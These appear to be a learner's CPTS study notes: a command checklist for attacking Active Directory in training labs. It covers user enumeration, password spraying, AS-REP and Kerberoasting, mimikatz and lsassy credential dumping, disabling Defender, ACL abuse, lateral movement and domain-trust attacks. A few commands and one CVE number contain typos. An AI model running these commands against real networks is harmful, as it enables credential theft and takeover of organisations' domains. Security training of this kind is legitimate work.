5 - AD Dominance - JA Smith

# Initial Enum w/o Creds ## Host Identification > Build `hosts.txt` - Create `hosts.txt` - Identify DC based - usually running DNS, LDAP, Kerberos, WinRM - Document all discovered hosts here - Start `responder` in analyze mode to discover IP addresses and hostnames ```bash sudo responder -I tun0 -A ``` - Start `wireshark` or `tshark` or `tcpdump` and listen for layer 2 traffic (ARP, MDNS, NBNS) to discover IP addresses and hostnames ```bash sudo tshark sudo tcpdump -i tun0 ``` - Perform a `ping` sweep ```bash fping -asgq 10.10.10.0/24 ``` - Run `nmap` scans across `host.txt` to discover open ports, then per host `nmap` scans based on open ports to discover associated services - Document all discovered ports and associated services on a per host basis ```bash nmap -iL hosts.txt -p- --min-rate 2000 nmap -p<comma_separted_list> TARGET -sCV -O ``` - DNS fuzzing ```bash gobuster dns -d http://<target_FQDN/IP>:<port> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt ``` ## User Identification > Build `users.txt` - Create `users.txt` - Document all discovered users here - Attempt to abuse SMB null session against DC to grab users ```bash nxc smb TARGET_DC --users #assumes null session; shows local users nxc smb TARGET_DC --rid-brute #shows local and domain users rpcclient -U "" TARGET_DC rpcclient gt; enumdomusers smbclient -N //TARGET_DC enum4linux-ng -U TARGET_DC | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" ``` - Attempt to user `kerbrute` to grab users based on wordlist ```bash kerbrute userenum -d inlanefreight.local --dc TARGET /opt/jsmith.txt sudo kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep -i user | cut -f2 -d"]" | cut -f2 -d":" | cut -f1 -d"@" | tee users.txt ``` - Attempt to abuse anonymous LDAP against DC to grab users ```bash ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" " ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U #-u flag specifices null session and -U flag specifies only users ``` - Attempt to grab users from DC with `lookupsid.py` (works better with creds) ```bash lookupsid.py inlanefreight.local/''@TARGET_DC ``` ## ASREP Roasting - Once we populated `users.txt`, try **ASREP roasting** ```bash GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip TARGET_DC -no-pass -usersfile users.txt nxc ldap <dc-fqdn> -u <user-list> -p '' --asreproast file.out ``` ## Gain First Set of AD Creds - Attempt [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/5 - Internal Password Spraying|Internal Password Spraying]] based on `user.txt` using - Use a smaller wordlist before using `rockyou.txt` with the most common passwords like "Welcome1", "ChangeMe1", "Spring2026", etc. - NOTE: Grab [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/3 - Determining Domain's Password Policy|Domain's Password Policy]] before spraying so as not to lockout any users ```bash sudo netexec smb TARGET_DC --pass-pol sudo netexec smb hosts.txt -u users.txt -p target_wordlist --continue-on-success | grep + kerbrute passwordspray -d inlanefreight.local --dc TARGET_DC users.txt Welcome1 ``` - Password Spraying ```bash nxc smb TARGET_DC -u users.txt -p <password> --continue-on-success |grep + #password spary with a user list and a single password nxc smb TARGET_DC -u users.txt -p /opt/rockyou.txt --continue-on-success --no-bruteforce |grep + #Tries each password against the corresponding username in the list (one-to-one), rather than testing all combination ``` - Create `passwords.txt` for future spraying and `creds.txt` as a reference to copy+paste from - Note: If we have creds for a user with `SYSTEM` level access, we essentially have domain creds - Once we have a foothold, start `responder` or `inveigh` on an interface associated with the internal network to listen for NTLM hashes - Crack hashes with `hashcat -m 5600` --- # Domain Enum with Creds > [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/7 - Credentialed Enum from Linux|Credentialed Enum from Linux]] > [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/8 - Credentialed Enum from Windows|Credentialed Enum from Windows]] ## Basic internal Enum ```bash hostname whoami /all systeminfo ipconfig /all qwinsta #show other users on host query user #show other users on host ``` ## ADCS Check ```bash nxc ldap DC_IP -u usernmae -p password -d domain -M adcs certipy-ad find -target DC.FQDN -u username -p password #enumerate cert templates certipy-ad find -target DC.FQDN -u username -p password -ns NS.IP -vulnerable -stdout #enumerate ADCS ESC vulns ``` ## Kerberos - Kerberos authentication enabled & NTLM authentication disabled when we see the`NTLM:False` message or `STATUS_NOT_SUPPRTED` error when using known creds with `nxc smb` - Ensure clock skew is minimal - Fix with any of the below methods ```bash sudo rdate -n DC_IP sudo ntpdate DC_IP sudo faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" COMMAND ``` - Generate Kerberos config file for target domain - Append `-k` to `nxc` commands ```bash nxc smb dc.voleur.htb --generate-krb5-file voleur.krb sudo cp voleur.krb /etc/krb5.conf ``` - Request TGT from KDC for target user - `/etc/krb5.conf` specifies the kdc and realm, so no need to include domain or DC_IP - TGTs are kept in the cache file specified in `klist`, e.g., `/tmp/krb5cc_1000` - Alternatively, we can use `impacket-getTGT` ```bash kinit username klist export KRB5CCNAME=/tmp/krb5cc_1000 #!!only do once per session!! ``` ## Bloodhound - Run a bloodhound ingestor such as `rusthound-ce` or `sharphound` - Note: TARGET_NS is typically the DC - Note: Descending order of AD info fidelity: `sharphound`, `rusthound-ce`, `bloodhound-python` - PS: `bloodhound-python` does not provide ADC enrollment info ```bash /opt/rusthound-ce -d inlanefreight.local -u inlanefreight@username -p password -z ``` - Stand up `bloodhound` container - Note: For full setup instructions, see [[2 - Docker & Kubernetes/_Install Docker & Bloodhound|Install Docker & Bloodhound]] ```bash cd /opt/bloodhound docker compose up -d #visit http://localhost:8080/ui/login ``` - For any creds we have, mark associated user as owned ## Host & Share Identification - Further build-out `hosts.txt` now that we have creds - Run `ldapdomaindump` to identify all domain joined hosts - Enumerate accessible shares with `snaffler`, `nxc`, and `smbmap` ```bash nxc smb TARGET -u <user> -p <password> --shares nxc smb TARGET -u <user> -p <password> -M spider_plus -- share '<share_name>' smbmap -u <user> -p <password> -d INLANEFREIGHT.LOCAL -H TARGET smbmap -u <user> -p <password> -d INLANEFREIGHT.LOCAL -H TARGET -R '<share_name>' --dir-only ``` ## User & Group Identification - Further build out `users.txt` now that we have creds ```bash nxc smb TARGET -u <user> -p <password> --pass-pol nxc smb TARGET -u <user> -p <password> --users nxc smb TARGET -u <user> -p <password> --rid-brute nxc smb TARGET -u <user> -p <password> --loggedon-users nxc smb TARGET -u <user> -p <password> --groups ``` - Gather list of DAs and privileged users ```bash python3 windapsearch.py --dc-ip TARGET_DC -u <user>@inlanefreight.local -p <password> --da # --da flag enumerates domain admins group members python3 windapsearch.py --dc-ip TARGET_DC -u <user>@inlanefreight.local -p <password> -PU # -PU flag finds privileged users ``` ```cmd net accounts #show password policy net groups /domain #list of all domain groups net user /domain #list of all domain users net view /domain #show hosts connected to domain net group "Domain Admins" /domain #show DAs net group "Domain Controllers" /domain #show DCs net localgroup Administrators #show local admins ``` ```powershell Import-Module ActiveDirectory Get-Module #confirm module was loaded Get-ADDomain #show basic info for domain Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #show users for domain Get-ADGroup -Filter * | select name #show groups for domain Get-ADGroup -Identity "Backup Operators" #show info for target group Get-ADGroupMember -Identity "Backup Operators" #show members of target groups Get-ADTrust -Filter * #show trust relationships ``` ## Keberoasting > [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/10 - Kerberoasting from Linux|Kerberoasting from Linux]] > [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/11 - Kerberoasting from Windows|Kerberoasting from Windows]] - Look for kerberoastable users ```bash GetUserSPNs.py -dc-ip TARGET_DC INLANEFREIGHT.LOCAL/<user> #gather list of SPNs GetUserSPNs.py -dc-ip TARGET_DC INLANEFREIGHT.LOCAL/<user> -request #grab all TGS tickets GetUserSPNs.py -dc-ip TARGET_DC INLANEFREIGHT.LOCAL/<user> -request-user TARGET_USER -outputfile hash.out #grab TGS ticekt for target user nxc ldap <dc-fqdn> -u <user> -p <password> --kerberoasting file.out ``` - NOTE: If you get a `KRB_AP_ERR_SKEW` error, temporarily sync your clock with the DC by running `sudo rdate -n <dc>` - Crack TGS ticket with `hashcat -m 13100` ## Foothold Enum - Once we have a foothold, enumerate protections on host: Defender, App Locker, and LAPS ```powershell Get-ExecutionPolicy -List Get-MpComputer Status Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections $ExecutionContext.SessionState.LanguageMode Get-LAPSComputers Find-LAPSDelegatedGroups Find-AdmPwdExtendedRights ``` - Disable or uninstall Defender ```powershell Set-MpPreference -DisableRealtimeMonitoring $true Uninstall-WindowsFeature -Name Windows-Defender ``` - Look to extract creds for other logged on users ```bash nxc smb TARGET -u <user> -p <password> --loggedon-users nxc smb TARGET -u <user> -p <password> -M lsassy nxc smb TARGET -u <user> -p <password> --lsa nxc smb TARGET -u <user> -p <password> --sam ``` ```cmd .\lazagne.exe all .\mimikatz.exe privilege::debug sekurlsa::credman sekurlsa::logonPasswords sekurlsa::minidump lsass.dmp sekurlsa::tickets /export ``` - Enumerate ACLs to find misconfigs or abuse vectors - Tastiest ACL entries: - `ForceChangePassword` - `AddMember` - `GenericAll` - `GenericWrite` - `DS-Replication-Get-Changes-All` ```powershell Import-Module .\PowerView.ps1 Find-InterestingDomainAcl $sid = Convert-NameToSid target_user Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} #enumerate ACLs for target_user Get-DomainGroup -Identity "target_group" | select memberof #enumerate membership for target_group $itgroupsid = Convert-NameToSid "target_group" et-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose #enumerate ACLs for target_group ``` --- # Lateral Movement & Pivoting - Always attempt cred reuse across services and hosts > [[5 - CPTS/2 - Checklists/6 - AD Hacking & Cred Maxing/4 - Cred Reuse Across Services|Cred Reuse Across Services]] > [[5 - CPTS/2 - Checklists/4 - Lateral Movement/1 - Lateral Movement & Cred Reuse|Lateral Movement & Cred Reuse]] - Lateral movement tools - `netexec` - `psexec.py` - `wmiexec.py` - `smbexec.py` - `atexec.py` - NOTE: If one tool does not work, try another as they all function differently - Develop an attack chain based on `bloodhound` output AND manually check with `powerview` or `sharpview` - For lateral movement, look-out for `CanRDP`, `CanPSREmote`, `SQLAdmin` groups within bloodhound > [[5 - CPTS/2 - Checklists/6 - AD Hacking & Cred Maxing/1 - AD Attack Path|AD Attack Path]] > [[5 - CPTS/2 - Checklists/6 - AD Hacking & Cred Maxing/3 - Bloodhound Attack Path|Bloodhound Attack Path]] - For pivoting, use `ligolo-ng` > [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/1a - Ligolo-ng Single Forward Pivot|Ligolo-ng Single Forward Pivot]] > [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/1b - Ligolo-ng Double Pivot|Ligolo-ng Double Pivot]] - Otherwise see [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/2 - Dynamic Port Forwarding with SSH & SOCKS|Dynamic Port Forwarding with SSH & SOCKS]] and [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/10 - Windows Port Forwarding with netsh|Windows Port Forwarding with netsh]] and [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/14 - Double Pivot with SocksOverRDP|Double Pivot with SocksOverRDP]] - Tools to move to pivot host: - `mimkatz.exe` - `lazagne.exe` - `snaffler.exe` - ligolo-ng `agent.exe` - `nc.exe` - `kerbrute.exe` - `rubeus.exe` --- # Exploitation ## Abuse Permissive ACLs - Notables ACLs: - `ForceChangePassword` - `AddMember` - `GenericAll` > Targeted kerberoasting `targetedKerberoast.py - `GenericWrite` > Targeted kerberoasting or shadow creds attack (when ADCS enabled) - `WriteSPN` > Targeted kerberoasting `targetedKerberoast.py` - `readGMSAPassword` - See [[6 - CTFS/CPTS Prep/TOMBWATCHER (HTB)|TOMBWATCHER (HTB)]] - `DS-Replication-Get-Changes-All` - NOTE: Abuse permissive ACLs with `BloodyAD` ## Look to elevate privs or find new creds - Run `lazagne.exe` to look for local creds ```cmd .\lazagne.exe all ``` - Run `snaffler.exe` to enumerate shares ```powershell .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data ``` - Run `sharpup.exe` to look for local misconfigs ```cmd .\SharpUp.exe audit ``` - Run `mimikatz.exe` to dump credman, LSASS, LSA, tickets ```cmd .\mimikatz.exe privilege::debug sekurlsa::credman sekurlsa::logonPasswords sekurlsa::minidump lsass.dmp sekurlsa::tickets /export ``` - Run `winpeas.exe` to find local privesc vectors - NOTE: If we gain creds for a higher privileged user, run bloodhound again for potentially increased domain visibility ## Common Vulns for Privesc or Lateral Movement - CVE-2021-42278 and CVE-2012-42287: [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/18 - noPac, PrintNightmare, PetitPotam#NoPac|noPac]] - CVE-2021-34527 and CVE-2021-1675: [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/18 - noPac, PrintNightmare, PetitPotam#Print Nightmare|PrintNightmare]] - CVE-2021-36942: [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/18 - noPac, PrintNightmare, PetitPotam#PetitPotam (MS-EFSRPC)|PetitPotam]] ## Common Misconfigs for Privesc or Lateral Movement - [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/19 - Misc Misconfigs#Exchange Related Group Membership|Exchange Group Membership]] - [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/19 - Misc Misconfigs#Printer Bug|MS-RPRN Printer Bug]] - [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/19 - Misc Misconfigs#MS14-068|MS14-068]] - Sniff for LDAP creds - Enumerate DNS records ```bash adidnsdump -u domain_name\\<user> ldap://TARGET_NS -r less records.csv #view the output and looks for interesting records ``` - Look for user passwords+notes in AD user description fields ```powershell Import-Module .\PowerView.ps1 Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null} ``` - Look for `PASSWD_NOT REQD` field and ASREP roast these users ```powershell Import-Module .\PowerView.ps1 Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol ``` - Check for GPOs that we have write access over ```powershell Import-Module .\PowerView.ps1 Get-DomainGPO |select displayname $sid=Convert-NameToSid "Domain Users" Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid} #enumerate GPO rights for the domain users group ``` - Look for GPP file `groups.xml` in SYSVOL - Look for creds in SMB shares and SYSVOL scripts --- # AD Trusts > [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/22 - Domain Trusts|Domain Trusts]] ## Enumerating AD Trusts - Enumerate trust relationships ```powershell Import-Module activedirectory Get-ADTrust -Filter * ``` ```powershell Import-Module .\PowerView.ps1 Get-DomainTrust Get-DomainTrustMapping Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName #enumerate users in child domain ``` ## Attacking AD Trusts: Child-Parent > [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/24 - Child-Parent Domain Trust Attacks from Linux|Child-Parent Domain Trust Attacks from Linux]] > [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/23 - Child-Parent Domain Trust Attacks from Windows|Child-Parent Domain Trust Attacks from Windows]] ## Attacking AD Trusts: Cross Forest >[[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/26 - Cross Forest Trust Abuse from Linux|Cross Forest Trust Abuse from Linux]] >[[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/25 - Cross Forest Trust Abuse from Windows|Cross Forest Trust Abuse from Windows]]